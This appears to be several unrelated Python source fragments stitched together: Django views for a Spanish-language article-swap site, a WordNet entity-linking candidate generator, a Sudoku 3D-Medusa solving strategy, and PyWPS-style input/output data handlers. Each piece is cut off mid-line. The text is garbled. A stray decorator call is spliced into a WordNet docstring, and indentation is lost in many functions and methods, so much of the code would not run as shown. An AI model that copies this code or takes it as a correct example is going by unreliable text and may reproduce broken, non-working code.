        articles = request.POST.getlist('articles')
        own_articles = request.POST.getlist('own_articles')
        comment = request.POST['comment']
        if len(comment) < 254:
            new_canje = Canje()
            # save first so M2M relations can be added below
            new_canje.save()
            article_id = 0
            for article in articles:
                article_id = article.split(' - ')[0]
                new_canje.articles_assignee.add(article_id)
                user_assignee = Article.objects.get(pk=article_id).user
            for article in own_articles:
                article_id = article.split(' - ')[0]
                new_canje.articles_creator.add(article_id)
            new_canje.comment = comment
            new_canje.user_creator = request.user
            new_canje.user_assignee = user_assignee
            # notify the other party with a link to the pending swap
            new_canje.notification = Notification.objects.create(
                user = user_assignee,
                is_readed = False,
                context = f"Tienes un canje pendiente de {request.user}. ¿Deseas aceptarlo?",
                link = f'/canjes/{new_canje.id}'
            )
            new_canje.save()
            return mis_canjes(request)
    else:
        if id_article == '0':
            return redirect('mis_canjes')
        else:
            # render the selection form: the other user's articles plus ours
            article_user = Article.objects.get(pk=id_article).user
            articles = Article.objects.filter(user=article_user)
            own_articles = Article.objects.filter(user=request.user)
            return render(request, 'iniciar_canje.html', {'articles': articles, 'own_articles': own_articles, 'user': article_user})
    return redirect('homepage')
@login_required(login_url='login')
def ver_canje(request, id):
    """View (GET) or resolve (POST) a pending swap.

    GET: only the two parties may view; renders both article lists.
    POST: marks the swap's notification read, then either accepts
    (state=1, opens a chat with a greeting message) or rejects (state=2).

    NOTE(review): ``Canje.objects.get(pk=id)`` raises DoesNotExist (500)
    for a bad id — consider get_object_or_404 as used elsewhere.
    """
    if request.method == "GET":
        canje = Canje.objects.get(pk=id)
        user_creator = canje.user_creator
        user_assignee = canje.user_assignee
        # only the two participants may see the swap
        if request.user != user_creator and request.user != user_assignee:
            return redirect('homepage')
        else:
            art_creator = []
            context = {}
            for articles_creator in canje.articles_creator.all():
                context = {
                    'title': articles_creator.title,
                    'link': '/articulo/' + str(articles_creator.id),
                    'category': articles_creator.category.title
                }
                art_creator.append(context)
            context = {}
            art_assignee = []
            for articles_assignee in canje.articles_assignee.all():
                context = {
                    'title': articles_assignee.title,
                    'link': '/articulo/' + str(articles_assignee.id),
                    'category': articles_assignee.category.title
                }
                art_assignee.append(context)
            return render(request, 'canjes.html', {'art_creator': art_creator, 'art_assignee': art_assignee, 'user_creator': user_creator, 'user_assignee': user_assignee, 'id': id})
    elif request.method == "POST":
        canje = Canje.objects.get(pk=id)
        # the pending-swap notification is resolved either way
        Notification.objects.filter(pk=canje.notification.id).update(is_readed=True)
        if request.POST.get('acept_button'):
            # accepted: open a chat between the parties with a greeting
            message = Message.objects.create(
                sender = request.user,
                content = "Hola! Acepte el canje!"
            )
            chat = Chat.objects.create(
                participant1 = request.user,
                participant2 = canje.user_creator,
            )
            chat.messages.set([message])
            chat.save()
            canje = Canje.objects.all().filter(pk=id)
            canje.update(state=1)
            return redirect('chats')
        else:
            # rejected
            canje = Canje.objects.all().filter(pk=id)
            canje.update(state=2)
    return redirect('homepage')
@login_required(login_url='login')  # login required to reach this page
def mis_canjes(request):
    """List the swaps started by the current user."""
    started = Canje.objects.all().filter(user_creator = request.user)
    rows = [
        {
            'title1': c.state,
            'title2': c.user_assignee,
            'title3': c.date_created,
            'title4': c.id,
        }
        for c in started
    ]
    return render(request, 'mis_canjes.html', {'canjes': rows})
def categories(request):
    """Category browser: all non-root categories plus the 9 newest articles."""
    subcategories = Category.objects.exclude(parent=None)
    latest = Article.objects.order_by("-date_created")[:9]
    cards = [
        {
            'title': art.title,
            'date_created': art.date_created,
            'link': '/articulo/' + str(art.id),
            'edit_article': '/articulo/edit/' + str(art.id),
            'image': art.image_one.url,
            'category': art.category.title,
            'user': str(art.user),
        }
        for art in latest
    ]
    return render(request, 'categories.html', {'categories': subcategories, 'articles': cards})
def notifications(request, id):
    """AJAX endpoint for the notification badge.

    ``id == '0'``: return the user's unread notifications and their count.
    Any other id: mark that notification read and return an empty list.
    """
    if request.method == "GET" and request.user.is_authenticated:
        if id == '0':
            unread = Notification.objects.filter(user=request.user).filter(is_readed=False)
            payload = [
                {'notif': n.context, 'notif_id': n.id}
                for n in unread
            ]
            return JsonResponse({'notifications': payload, 'count': len(payload)}, safe=False)
        else:
            Notification.objects.filter(pk=id).update(is_readed=True)
            return JsonResponse({'notifications': [], 'count': 0}, safe=False)
def get_images(request, id):
    """JSON list of the URLs of every non-empty image slot of an article."""
    photos = []
    if request.method == "GET":
        art = Article.objects.get(pk=id)
        slots = (art.image_one, art.image_two, art.image_three,
                 art.image_four, art.image_five)
        photos = [img.url for img in slots if img]
        return JsonResponse({'photos': photos}, safe=False)
class verificationview(View):
    """Activate a user account from the emailed uidb64/token link
    (see ``crear_usuario``, which builds the link)."""
    def get(self, request, uidb64, token):
        try:
            # recover the user pk encoded in the activation URL
            id = force_text(urlsafe_base64_decode(uidb64))
            user = User.objects.get(pk=id)
            if not token_generator.check_token(user, token):
                return redirect('login')
            if user.is_active:
                # already activated: nothing to do
                return redirect('homepage')
            user.is_active = True
            user.save()
            messages.success(request, 'Usuario activado con Éxito')
            return redirect('login')
        except Exception as ex:
            # NOTE(review): broad except silently swallows decode/lookup
            # failures (and any unexpected error) and falls through to
            # 'login'; consider narrowing to (ValueError, User.DoesNotExist).
            pass
        return redirect('login')
def robots_txt(request):  # serves robots.txt
    """Render the site's robots.txt from a template."""
    return render(request, "robots.txt", {})
@login_required(login_url='login')  # login required to reach this page
def chats(request):
    """Chat overview: one row per conversation involving the current user.

    The full, oldest-first history of the first chat is preloaded so the
    template can render it immediately.
    """
    my_chats = Chat.objects.all().filter(Q(participant1=request.user) | Q(participant2=request.user))
    rows = []
    first_messages = []
    first_chat_id = []
    for idx, conv in enumerate(my_chats):
        if idx == 0:
            # preload the first conversation's complete history
            first_messages = conv.messages.all().order_by('timestamp')
            first_chat_id = conv.id
        newest = conv.messages.all().order_by('-timestamp')[0]
        other = conv.participant2 if request.user == conv.participant1 else conv.participant1
        rows.append({
            'time': newest.timestamp,
            'user': other,
            'content': newest.content,
            'chat_id': conv.id,
        })
    return render(request, "chat.html", {'context': rows, 'messages': first_messages, 'first_chat_id': first_chat_id})
def chat(request, | |
"""
Notes on wordnet ids:
in KG embeddings, have both synset and lemma nodes:
synsets are keyed by something like able.a.01register("wordnet_mention_generator")
each synset has a number of lemmas, keyed by something like able%3:00:00::
In WSD task, you are given (lemma, pos) and asked to predict the lemma
key, e.g. (able, adj) -> which synset do we get?
Internally, we use the able.a.01 key for synsets, but maintain a map
from (lemma, pos, internal key) -> external key for evaluation with semcor.
"""
import torch
import random
from typing import List, Dict
from allennlp.data import DatasetReader, Token, Vocabulary, Tokenizer
from allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer, TokenCharactersIndexer
from allennlp.data.fields import Field, TextField, ListField, SpanField, ArrayField, MetadataField
from allennlp.data.instance import Instance
from allennlp.models import Model
from allennlp.common.file_utils import cached_path
from nltk.corpus import wordnet as wn
from nltk.stem import PorterStemmer
from collections import defaultdict
from kb.common import JsonFile, get_empty_candidates
from kb.kg_embedding import KGTuplePredictor
from kb.entity_linking import EntityLinkingReader
from kb.common import WhitespaceTokenizer, MentionGenerator, init_bert_weights, EntityEmbedder
from pytorch_pretrained_bert.modeling import BertLayerNorm
import numpy as np
import h5py
import spacy
from spacy.tokens import Doc
class WordNetSpacyPreprocessor:
    """
    A "preprocessor" that really does POS tagging and lemmatization using
    spacy, plus some hand crafted rules.

    allennlp tokenizers take strings and return lists of Token classes;
    we run spacy first, remap POS tags that differ from wordnet's scheme,
    drop whitespace-only tokens, and return new Token objects.
    """
    def __init__(self, whitespace_tokenize_only: bool = False):
        self.nlp = spacy.load('en_core_web_sm', disable=['tagger', 'parser', 'ner', 'textcat'])
        if whitespace_tokenize_only:
            self.nlp.tokenizer = WhitespaceTokenizer(self.nlp.vocab)
        # spacy POS tags are close to wordnet's; remap the ones that differ
        self.spacy_to_wordnet_map = {
            'PROPN': 'NOUN'
        }

    def __call__(self, text: str) -> List[Token]:
        spacy_doc = self.nlp(text)
        tokens = []
        for spacy_token in spacy_doc:
            if spacy_token.is_space:
                continue
            tokens.append(Token(
                spacy_token.text,
                pos_=self.spacy_to_wordnet_map.get(spacy_token.pos_, spacy_token.pos_),
                lemma_=spacy_token.lemma_,
            ))
        return tokens
def _norm_lemma(lemma_str):
return lemma_str.replace('_', ' ').replace('-', ' ')
# Map a wordnet POS letter to the coarse POS tag used by semcor.
# The trailing comment on each entry is the wordnet sense-key type prefix.
WORDNET_TO_SEMCOR_POS_MAP = {
    'n': 'NOUN', # %1
    'v': 'VERB', # %2
    'a': 'ADJ', # %3
    'r': 'ADV', # %4
    's': 'ADJ', # %5 (satellite adjectives also map to ADJ)
}
def load_candidate_maps(fname, topk=30, count_smoothing=1):
    """
    Load the candidate maps from the entity file (the jsonl dump produced
    by extract_wordnet.py).

    returns:
        candidates: Dict[normalized lemma string] -> list of candidate
            metadata dicts with keys synset_id, lemma_id, pos, prior
        lemma_id_to_synset_id: Dict["able%3:00:00"] -> "able.a.01"

    Lemmas are underscore and hyphen normalized for training.  Only the
    ``topk`` highest-count candidates are kept per lemma.  When
    ``count_smoothing >= 0`` the counts are smoothed and normalized into
    priors; when it is negative the raw counts are returned untouched.
    """
    candidates = {}
    lemma_id_to_synset_id = {}
    with JsonFile(cached_path(fname), 'r') as fin:
        for entity in fin:
            if entity['type'] != 'lemma':
                continue
            lemma_id = entity['id']
            synset_id = entity['synset']
            metadata = {'synset_id': synset_id,
                        'lemma_id': lemma_id,
                        'pos': entity['pos'],
                        'prior': entity['count']}
            # normalize the lemma string and group candidates under it
            key = _norm_lemma(lemma_id.partition('%')[0])
            candidates.setdefault(key, []).append(metadata)
            lemma_id_to_synset_id[lemma_id] = synset_id
    # trim each lemma to its topk most frequent candidates and optionally
    # turn smoothed counts into normalized priors
    for key, cands in candidates.items():
        if len(cands) > topk:
            # descending by count, then truncate
            cands = sorted(cands, key=lambda c: c['prior'], reverse=True)[:topk]
        if count_smoothing >= 0:
            total = sum(c['prior'] + count_smoothing for c in cands)
            for cand in cands:
                cand['prior'] = (cand['prior'] + count_smoothing) / total
        candidates[key] = cands
    return candidates, lemma_id_to_synset_id
# Unsupervised setting for LM:
# raw data -> use spacy to get lemma -> look up all candidates normalizing
# - and _
#
# With annotated data:
# at train time:
# given gold spans and entity ids:
# map semcor tokens to flat token sequence + gold ids + gold spans
# look up all candidate spans using raw data approach ignoring POS and lemma
# remove generic entity types
# restrict candidate spans to just those that have annotated senses
#     compute the recall of gold span / entity from pruned candidate list (for MWE separate from single words)
#
# at test time:
# given gold POS and lemma, get candidates.
# for generic entity types, use heuristic to restrict candidates
# should have near 100% recall of gold span
# and first sense baseline should be high
def _update_candidate_list(c, s, e, p):
c['candidate_spans'].append(s)
c['candidate_entities'].append(e)
c['candidate_entity_priors'].append(p)
@MentionGenerator.register("wordnet_mention_generator")
class WordNetCandidateMentionGenerator(MentionGenerator):
"""
Generate lists of candidate entities. Provides several methods that
process input text of various format to produce mentions.
Each text is represented by:
{'tokenized_text': List[str],
'candidate_spans': List[List[int]] list of (start, end) indices for candidates,
where span is tokenized_text[start:(end + 1)]
'candidate_entities': List[List[str]] = for each entity,
the candidates to link to. value is synset id, e.g
able.a.02 or hot_dog.n.01
'candidate_entity_priors': List[List[float]]
}
"""
    def __init__(
        self,
        entity_file: str,
        max_entity_length: int = 7,
        max_number_candidates: int = 30,
        count_smoothing: int = 1,
        use_surface_form: bool = False,
        random_candidates: bool = False):
        """Build the candidate generator.

        entity_file: jsonl dump from extract_wordnet.py.
        Candidate maps are loaded with raw counts (count_smoothing=-1);
        smoothing/normalization happens later per lookup.
        """
        self._raw_data_processor = WordNetSpacyPreprocessor()
        # whitespace-only variant used when the input is pre-tokenized
        self._raw_data_processor_whitespace = WordNetSpacyPreprocessor(
            whitespace_tokenize_only=True
        )
        self._candidate_list, self._lemma_to_synset = load_candidate_maps(
            entity_file, count_smoothing=-1
        )
        # candidate_list['hot dog'] -> [all candidate lemma metadata dicts]
        # generic named-entity lemmas map to fixed synsets
        self._entity_synsets = {
            #'location%1:03:00::': 'location.n.01', # (LOC)
            #'person%1:03:00::': 'person.n.01', # (PER)
            #'group%1:03:00::': 'group.n.01' # (ORG)
            'location': 'location.n.01', # (LOC)
            'person': 'person.n.01', # (PER)
            'group': 'group.n.01' # (ORG)
        }
        # lemma ids of the generic entity types, skipped during training
        self._entity_lemmas = {
            'location%1:03:00::',
            'person%1:03:00::',
            'group%1:03:00::',
        }
        self._max_entity_length = max_entity_length
        self._max_number_candidates = max_number_candidates
        self._count_smoothing = count_smoothing
        self._use_surface_form = use_surface_form
        self._random_candidates = random_candidates
        if self._random_candidates:
            # pool of all synsets, sampled from when random candidates are on
            self._unique_synsets = list(set(self._lemma_to_synset.values()))
def get_mentions_with_gold_spans(
self, gold_annotations
):
"""
use for training with semcor -- it will use the full unrestricted
generator, but restrict to just the gold annotation spans, without
using the gold lemma or POS.
remove generic entity types (PER, LOC, ORG)
restrict candidate spans to just those that have annotated senses
"""
tokenized_text = gold_annotations['tokenized_text']
text = ' '.join(gold_annotations['tokenized_text'])
candidates = self.get_mentions_raw_text(text, whitespace_tokenize=True,
allow_empty_candidates=True)
# each gold annotation needs to be in output
# will look up candidates by (start, end) indices so remap candidates
candidates_by_endpoints = {
tuple(start_end): {'entities': ent, 'priors': pri}
for start_end, ent, pri in zip(
candidates['candidate_spans'],
candidates['candidate_entities'],
candidates['candidate_entity_priors']
)
}
filtered_candidates = {
'tokenized_text': tokenized_text,
'candidate_spans': [],
'candidate_entities': [],
'candidate_entity_priors': []
}
for k in range(len(gold_annotations['gold_spans'])):
span = gold_annotations['gold_spans'][k]
lemma = gold_annotations['gold_lemmas'][k]
pos = gold_annotations['gold_pos'][k]
lemma_id = gold_annotations['gold_lemma_ids'][k]
if lemma_id in self._entity_lemmas:
# skip
continue
span_candidates = candidates_by_endpoints.get(tuple(span))
if span_candidates is None:
# this one wasn't found by candidate generation
continue
# add to the list
_update_candidate_list(filtered_candidates, span,
span_candidates['entities'],
span_candidates['priors'])
return filtered_candidates
    def get_mentions_from_gold_span_lemma_pos(
        self, gold_annotations
    ):
        """
        Candidate generation for evaluation: one candidate list per gold
        span, restricted by the gold lemma and POS, with a heuristic for
        the generic entity types (PER/LOC/ORG).

        gold_annotations is the output of unpack_wsd_training_instance and
        has keys: tokenized_text, gold_spans, gold_entities, gold_lemmas,
        gold_pos, gold_ids.

        NOTE(review): ``self._candidate_list[normalized_lemma]`` raises
        KeyError for a lemma absent from the entity file — presumably the
        evaluation data guarantees coverage; confirm.
        """
        # need one output entry for each gold span
        tokenized_text = gold_annotations['tokenized_text']
        candidates = {'tokenized_text': tokenized_text,
                      'candidate_spans': [],
                      'candidate_entities': [],
                      'candidate_entity_priors': []}
        tokenized_text = gold_annotations['tokenized_text']
        for k in range(len(gold_annotations['gold_spans'])):
            span = gold_annotations['gold_spans'][k]
            lemma = gold_annotations['gold_lemmas'][k]
            pos = gold_annotations['gold_pos'][k]
            # generic named entities: if the surface token differs from the
            # lemma, assume it is the generic type and emit its fixed synset
            if pos == 'NOUN' and lemma in self._entity_synsets:
                if lemma != tokenized_text[span[0]]:
                    # hack, assume it's the generic entity type
                    candidate_ids = [self._entity_synsets[lemma]]
                    candidate_priors = [1.0]
                    _update_candidate_list(
                        candidates, span, candidate_ids, candidate_priors
                    )
                    continue
            # look up by (lemma, pos)
            normalized_lemma = _norm_lemma(lemma)
            all_candidates = self._candidate_list[normalized_lemma]
            # keep only candidates whose wordnet POS maps to the gold POS
            cand_entities = []
            cand_priors = []
            for cand in all_candidates:
                if WORDNET_TO_SEMCOR_POS_MAP[cand['pos']] == pos:
                    cand_entities.append(cand['synset_id'])
                    cand_priors.append(cand['prior'])
            # smooth the raw counts and renormalize into a prior
            sum_prior = sum(cand_priors) + len(cand_priors) * self._count_smoothing
            norm_prior = [(p + self._count_smoothing) / sum_prior for p in cand_priors]
            _update_candidate_list(candidates, span, cand_entities, norm_prior)
        return candidates
def get_mentions_raw_text(
self,
text: str,
whitespace_tokenize: bool = False,
allow_empty_candidates: bool = False,
):
"""
returns:
{'tokenized_text': List[str],
'candidate_spans': List[List[int]] list of (start, end) indices for candidates,
where span is tokenized_text[start:(end + 1)]
'candidate_entities': List[List[str]] = for each entity,
the candidates to link to. value is synset id, e.g
able.a.02 or hot_dog.n.01
'candidate_entity_priors': List[List[float]]
}
"""
if whitespace_tokenize:
tokenized = self._raw_data_processor_whitespace(text)
else:
tokenized = | |
# repo: sok63/sudoku-1
#
# Medusa based strategy module
#
import itertools
from logger import *
from playbook import *
from sudoku import *
class MedusaBase(Strategy):
    def __init__(self, name, simple = True):
        # simple=True restricts to single-hint rules (simple coloring);
        # False enables the full 3D-MEDUSA rule set.
        Strategy.__init__(self, name)
        self.simple = simple
"""
Return the set of links in the graph optionally conditioned upon
hint and color matching. Each link takes the form of a 2-tuple
with node and hint.
"""
def medusa_all_links(self, graph, hint = None, color = None):
return set([l for l, c in graph.keys()
if (hint is None or l[1] == hint) and
(color is None or c == color)])
"""
Return True if the link is in the graph.
"""
def medusa_has_link(self, graph, link):
for color in [True, False]:
if (link, color) in graph:
return True
return False
"""
Return the set of all Sudoku nodes in the 3D-MEDUSA graph.
"""
def medusa_all_nodes(self, graph, hint = None, color = None):
return set([n for n, h in self.medusa_all_links(graph, hint, color)])
"""
Return the set of all hints in the 3D-MEDUSA graph. For simple
coloring, there will be one and only.
"""
def medusa_all_hints(self, graph, color = None):
return set([h for n, h in self.medusa_all_links(graph, None, color)])
"""
Return the set of hints in the 3D-MEDUSA graph in the given
node and with the given color.
"""
def medusa_node_hints(self, graph, node, color = None):
return set([h for x, h in self.medusa_all_links(graph, None, color) if x == node])
"""
Return the raw "chain" as a list of locations and the connected
locations for each.
"""
def medusa_chain(self, graph):
return graph.items()
"""
Format the medusa graph for printing.
"""
def medusa_format(self, graph):
return ", ".join("{0}[{1}]".format(
self.medusa_format_loc(k),
"|".join(self.medusa_format_loc(l) for l in v))
for k, v in graph.items())
"""
Format a single medusa graph node for printing.
"""
def medusa_format_loc(self, loc):
(n, h), c = loc
return "{0}{1}[{2}]".format("+" if c else "-", h, n)
"""
Purge all hints in the 3D-MEDUSA graph with the given color.
This should always return True since a 3D-MEDUSA graph should
have hints of both colors.
"""
def medusa_purge_color(self, plan, graph, color, reason, note):
status = False
for node in self.medusa_all_nodes(graph):
hints = self.medusa_node_hints(graph, node, color)
if self.purge_hints(plan, [node], hints, reason, note):
status = True
return status
"""
If two hints in a node have the same color, all hints of that
color can be removed from the graph.
"""
def medusa_conflict_node(self, plan, graph, reason):
for node in self.medusa_all_nodes(graph):
if node.is_complete():
continue
for color in [True, False]:
hints = self.medusa_node_hints(graph, node, color)
if len(hints) > 1:
note = "hints {0} have color {1} in {2}".format(
sorted(hints), color, node)
return self.medusa_purge_color(plan, graph, color, reason, note)
return False
"""
It the same hint appears twice in the same color in the same lot,
all hints of that color can be removed from the graph.
"""
def medusa_conflict_lot(self, plan, graph, reason):
nodes = self.medusa_all_nodes(graph)
for lot in plan.get_sudoku().get_lots():
lnodes = nodes & set(lot.get_nodes())
for color in [True, False]:
conflicts = set()
candidates = [self.medusa_node_hints(graph, node, color) for node in lnodes
if not node.is_complete()]
for pair in itertools.combinations(candidates, 2):
conflicts |= pair[0] & pair[1]
if conflicts:
note = "hints {0} have color {1} in {2}".format(
sorted(conflicts), color, lot)
return self.medusa_purge_color(plan, graph, color, reason, note)
return False
"""
Check if a node in the 3D-MEDUSA graph has two conflicting colors.
"""
def medusa_bicolor_node(self, plan, graph, reason):
status = False
for node in self.medusa_all_nodes(graph):
if node.is_complete():
continue
on = self.medusa_node_hints(graph, node, True)
off = self.medusa_node_hints(graph, node, False)
if not on or not off:
continue
hints = on | off
if self.test_update([node], hints):
self.update_hints(plan, [node], hints, reason, "dual-color node")
status = True
return status
"""
Check if a node outside of the 3D-MEDUSA graph can simultaneously
"see" nodes of conflicting colors.
"""
def medusa_conflict_offchain(self, plan, graph, reason):
status = False
for hint in self.medusa_all_hints(graph):
on = self.find_related(self.medusa_all_nodes(graph, hint, True))
off = self.find_related(self.medusa_all_nodes(graph, hint, False))
intersect = on & off
hints = set([hint])
if self.test_purge(intersect, hints):
self.purge_hints(plan, intersect, hints, reason, "off-chain color conflict")
status = True
return status
"""
If an uncolored hint in a node can see the same hint but colored in
the lot, and any hint exists in the same node with opposite color,
we can remove the uncolored hint.
"""
def medusa_node_lot(self, plan, graph, reason):
status = False
nodes = self.medusa_all_nodes(graph)
for node in nodes:
if node.is_complete():
continue
hints = node.get_hints()
for color in [True, False]:
hints -= self.medusa_node_hints(graph, node, color)
area = node.find_related()
conflicts = set()
for hint in hints:
for color in [True, False]:
if not self.medusa_node_hints(graph, node, color):
continue
intersect = area & self.medusa_all_nodes(graph, hint, not color)
if intersect:
conflicts.add(hint)
if self.test_purge([node], conflicts):
self.purge_hints(plan, [node], conflicts, reason, "node lot conflict")
status = True
return status
"""
Check if a node outside of the 3D-MEDUSA graph is emptied by
nodes of the same color.
"""
def medusa_empty_color(self, plan, graph, reason):
nodes = set(plan.get_sudoku().get_incomplete()) - self.medusa_all_nodes(graph)
for node in nodes:
for color in [True, False]:
status = True
for hint in node.get_hints():
intersect = self.medusa_all_nodes(graph, hint, color) & node.find_related()
if not intersect:
status = False
break
if status:
note = "{0} emptied by color {1}".format(node, color)
return self.medusa_purge_color(plan, graph, color, reason, note)
return False
"""
Process a 3D-MEDUSA graph.
"""
def medusa_process(self, plan, graph):
reason = {"chain": self.medusa_format(graph),
"__chain__": self.medusa_chain(graph)}
status = False
if not self.simple and self.medusa_conflict_node(plan, graph, reason):
status = True
if self.medusa_conflict_lot(plan, graph, reason):
status = True
if not self.simple and self.medusa_bicolor_node(plan, graph, reason):
status = True
if self.medusa_conflict_offchain(plan, graph, reason):
status = True
if self.medusa_node_lot(plan, graph, reason):
status = True
if not self.simple and self.medusa_empty_color(plan, graph, reason):
status = True
return status
"""
Return all exclusive links emanating from the given link.
"""
def medusa_find_links(self, link):
node, hint = link
# Look for exclusive links in each lot.
nodes = [lot.exclusive_link(node, hint) for lot in node.get_lots()]
nodes = set([n for n in nodes if n])
links = set([(n, hint) for n in nodes])
# Look for exclusive link in the node.
if not self.simple:
diff = node.get_hints() - set([hint])
if len(diff) == 1:
sibling = diff.pop()
links.add((node, sibling))
return links
"""
Add the next location to the graph and return True if it didn't
exist in the graph before. Meanwhile, make a connection from the
current location to the next if and only if we didn't come from
there.
"""
def medusa_add(self, graph, next, loc = None):
status = not next in graph
if status:
graph[next] = []
if loc and not loc in graph[next]:
graph[loc].append(next)
return status
"""
Recursive 3D-MEDUSA graph walk. It takes the partially constructed
graph and a location in the graph and enters all edges emanating
from that location into the graph. It calls itself if there are any
new location to be explored. Otherwise, the recursion terminates.
"""
    def medusa_walk(self, loc, graph):
        """Recursively expand *graph* with every location reachable from *loc*."""
        link, color = loc
        # Add the origin to the graph.
        if not graph:
            self.medusa_add(graph, loc)
        locs = []
        # Exclusive links always flip the color between connected locations.
        links = self.medusa_find_links(link)
        for next in [(l, not color) for l in links]:
            if self.medusa_add(graph, next, loc):
                locs.append(next)
        # Recurse only into locations that were new; already-known ones are
        # expanded elsewhere, which guarantees the recursion terminates.
        for next in locs:
            self.medusa_walk(next, graph)
"""
Each 3D-MEDUSA instance is a graph. The node in the graph, referred
to as location henceforth to not confuse with the Sudoku node, is a
2-tuple of a link and its binary color. The link is a 2-tuple by
itself of Sudoku node and hint. An edge may connect two locations
which indicates the existence of an exclusive (or strong) link
between the two links. The color of the link in a 3D-MEDUSA graph
always alternates between any pair of connected links. We use a dict
to represent the 3D-MEDUSA graph.
The 3D-MEDUSA instance is an undirected, fully reachable, and possibly
cyclic graph. That implies we will eventually cover the entire graph
regardless where we start.
A Sudoku instance may have multiple 3D-MEDUSA instances, each of which
is represented | |
of the data."""
if not PY2 and isinstance(self.data, bytes):
return BytesIO(self.data)
else:
return StringIO(text_type(self.data))
class StreamHandler(DataHandler):
    """Data handler whose source is a readable stream object."""
    # Name of the source property this handler exposes.
    prop = 'stream'
    @property
    def stream(self):
        """Return the stream."""
        return self._stream
    @stream.setter
    def stream(self, value):
        """Set the stream."""
        # Drop cached representations derived from the previous source.
        self._reset_cache()
        self._stream = value
        self._check_valid()
    @property
    def data(self):
        """Return the data from the stream."""
        # The stream is consumed only once; later reads hit the cache.
        if self._data is None:
            self._data = self.stream.read()
        return self._data
class UrlHandler(FileHandler):
    """Data handler that fetches its content from a URL reference."""
    # Name of the source property this handler exposes.
    prop = 'url'
    @property
    def url(self):
        """Return the URL."""
        return self._url
    @url.setter
    def url(self, value):
        """Set the URL value."""
        self._reset_cache()
        self._url = value
        self._check_valid()
    @property
    def file(self):
        """Download the referenced document and return the local file path.

        The download is lazy and cached: nothing is fetched until this
        property is first accessed.

        :raises FileSizeExceeded: when the document exceeds the configured
            ``maxsingleinputsize``
        :raises NoApplicableCode: on any other network or filesystem error
        """
        if self._file is not None:
            return self._file
        self._file = self._build_file_name(href=self.url)
        max_byte_size = self.max_input_size()
        # Create request
        try:
            reference_file = self._openurl(self.url, self.post_data)
            # Content-Length may be absent (e.g. chunked transfer); the
            # size is then re-checked below while streaming.
            data_size = reference_file.headers.get('Content-Length', 0)
        except Exception as e:
            raise NoApplicableCode('File reference error: {}'.format(e))
        # NOTE(review): max_byte_size is in bytes although the message says
        # megabytes -- confirm which unit should be reported.
        error_message = 'File size for input "{}" exceeded. Maximum allowed: {} megabytes'.format(
            self.inpt.get('identifier', '?'), max_byte_size)
        if int(data_size) > int(max_byte_size):
            raise FileSizeExceeded(error_message)
        try:
            with open(self._file, 'wb') as f:
                data_size = 0
                for chunk in reference_file.iter_content(chunk_size=1024):
                    data_size += len(chunk)
                    if int(data_size) > int(max_byte_size):
                        raise FileSizeExceeded(error_message)
                    f.write(chunk)
        except FileSizeExceeded:
            # Fix: let the size-limit error propagate unchanged instead of
            # masking it as a generic NoApplicableCode.
            raise
        except Exception as e:
            raise NoApplicableCode(e)
        return self._file
    @property
    def post_data(self):
        """Payload sent with the request when the reference uses POST."""
        return self._post_data
    @post_data.setter
    def post_data(self, value):
        self._post_data = value
    @staticmethod
    def _openurl(href, data=None):
        """Open given href with a streaming request.

        Issues a POST when *data* is given, a GET otherwise.
        """
        LOGGER.debug('Fetching URL {}'.format(href))
        if data is not None:
            req = requests.post(url=href, data=data, stream=True)
        else:
            req = requests.get(url=href, stream=True)
        return req
    @staticmethod
    def max_input_size():
        """Calculates maximal size for input file based on configuration
        and units.

        :return: maximum file size in bytes
        """
        ms = config.get_config_value('server', 'maxsingleinputsize')
        return config.get_size_mb(ms) * 1024**2
class SimpleHandler(DataHandler):
    """Data handler for Literal In- and Outputs

    >>> class Int_type(object):
    ...     @staticmethod
    ...     def convert(value): return int(value)
    >>>
    >>> class MyValidator(object):
    ...     @staticmethod
    ...     def validate(inpt): return 0 < inpt.data < 3
    >>>
    >>> inpt = SimpleHandler(data_type = Int_type)
    >>> inpt.validator = MyValidator
    >>>
    >>> inpt.data = 1
    >>> inpt.validator.validate(inpt)
    True
    >>> inpt.data = 5
    >>> inpt.validator.validate(inpt)
    False
    """
    def __init__(self, workdir=None, data_type=None, mode=MODE.NONE):
        """
        :param workdir: working directory for temporary files
        :param data_type: one of LITERAL_DATA_TYPES
        :param mode: validation mode
        :raises ValueError: when data_type is not a known literal type
        """
        DataHandler.__init__(self, workdir=workdir, mode=mode)
        if data_type not in LITERAL_DATA_TYPES:
            raise ValueError('data_type {} not in {}'.format(data_type, LITERAL_DATA_TYPES))
        self.data_type = data_type
    @DataHandler.data.setter
    def data(self, value):
        """Set data value. Inputs are converted into target format.
        """
        # Convert only real values; None must stay None.
        if self.data_type and value is not None:
            value = convert(self.data_type, value)
        # Delegate to the base-class setter to keep its caching behaviour.
        DataHandler.data.fset(self, value)
class BasicIO:
    """Basic Input/Output class

    Holds the metadata common to every process input and output.

    :param identifier: unique identifier of the input/output
    :param title: human readable title
    :param abstract: longer description
    :param keywords: list of keywords
    :param min_occurs: minimal number of occurrences
    :param max_occurs: maximal number of occurrences
    :param metadata: list of metadata objects
    """
    def __init__(self, identifier, title=None, abstract=None, keywords=None,
                 min_occurs=1, max_occurs=1, metadata=None):
        self.identifier = identifier
        self.title = title
        self.abstract = abstract
        self.keywords = keywords
        self.min_occurs = int(min_occurs)
        self.max_occurs = int(max_occurs)
        # Fix the shared mutable-default pitfall: each instance gets its
        # own list unless one is explicitly provided.
        self.metadata = metadata if metadata is not None else []
class BasicLiteral:
    """Basic literal Input/Output class

    Holds the literal data type and its units of measure (UOMs).
    """
    def __init__(self, data_type="integer", uoms=None):
        # NOTE(review): assert is stripped under `python -O`; raising
        # ValueError (as SimpleHandler does) would be more robust -- confirm.
        assert data_type in LITERAL_DATA_TYPES
        self.data_type = data_type
        # list of uoms
        self.uoms = []
        # current uom
        self._uom = None
        # add all uoms (upcasting to UOM)
        if uoms is not None:
            for uom in uoms:
                if not isinstance(uom, UOM):
                    uom = UOM(uom)
                self.uoms.append(uom)
        if self.uoms:
            # default/current uom
            self.uom = self.uoms[0]
    @property
    def uom(self):
        """Currently selected unit of measure (or None)."""
        return self._uom
    @uom.setter
    def uom(self, uom):
        # None is silently ignored so the current UOM is never cleared.
        if uom is not None:
            self._uom = uom
class BasicComplex(object):
    """Basic complex input/output class

    Tracks the supported formats and the currently selected data format.
    """
    def __init__(self, data_format=None, supported_formats=None):
        self._data_format = data_format
        self._supported_formats = ()
        if supported_formats:
            self.supported_formats = supported_formats
        if data_format:
            self.data_format = data_format
        elif self.supported_formats:
            # not an empty list, set the default/current format to the first
            self.data_format = supported_formats[0]
    def get_format(self, mime_type):
